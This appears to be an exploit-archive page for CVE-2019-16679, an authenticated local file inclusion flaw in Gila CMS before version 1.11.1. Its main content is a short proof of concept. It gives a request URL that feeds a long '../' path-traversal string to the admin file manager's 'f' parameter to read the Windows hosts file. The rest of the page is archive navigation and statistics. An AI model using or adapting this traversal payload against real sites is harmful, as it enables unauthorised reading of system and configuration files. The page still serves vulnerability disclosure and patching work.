Gila CMS Local File Inclusion

Gila CMS Local File Inclusion: Posted Sep 23, 2019; Authored by Sainadh Jamalpur; Gila CMS versions prior to 1.11.1 suffer from a local file inclusion vulnerability.; tags | exploit, local, file inclusion; advisories | CVE-2019-16679; SHA-256 | 22e0a1101068baf0503e80cd1e0d344ee677b4dc56a7fc0a9b7662fcb933b1d2; Download | Favorite | View

Gila CMS Local File Inclusion

# Exploit Title: Authenticated Local File Inclusion(LFI) in GilaCMS
# Google Dork: N/A
# Date: 04-08-2019
# Exploit Author: Sainadh Jamalpur
# Vendor Homepage: https://github.com/GilaCMS/gila
# Software Link: https://github.com/GilaCMS/gila
# Version: 1.10.9
# Tested on: XAMPP version 3.2.2 in Windows 10 64bit,
# CVE : CVE-2019-16679

*********** *Steps to reproduce the Vulnerability* *************

Login into the application as an admin user or equivalent user and go the
below link

http://localhost/gilacms/admin/fm/?f=src../../../../../../../../../WINDOWS/system32/drivers/etc/hosts

################################################################

Top Authors In Last 30 Days

Red Hat 207 files
Ubuntu 98 files
Debian 18 files
indoushka 18 files
Gentoo 14 files
Google Security Research 13 files
CraCkEr 9 files
Mirabbas Agalarov 9 files
Apple 8 files
nu11secur1ty 7 files

File Archives

Systems

AIX (428)
Apple (1,979)
BSD (373)
CentOS (57)
Cisco (1,920)
Debian (6,753)
Fedora (1,691)
FreeBSD (1,244)
Gentoo (4,321)
HPUX (879)
iOS (344)
iPhone (108)
IRIX (220)
Juniper (67)
Linux (45,783)
Mac OS X (685)
Mandriva (3,105)
NetBSD (256)
OpenBSD (482)
RedHat (13,311)
Slackware (941)
Solaris (1,610)
SUSE (1,444)
Ubuntu (8,633)
UNIX (9,237)
UnixWare (186)
Windows (6,555)
Other

Gila CMS Local File Inclusion

Gila CMS Local File Inclusion

File Archive:

June 2023

Top Authors In Last 30 Days

File Tags

File Archives

Systems

Gila CMS Local File Inclusion

Share This

Gila CMS Local File Inclusion

File Archive:

June 2023

Top Authors In Last 30 Days

File Tags

File Archives

Systems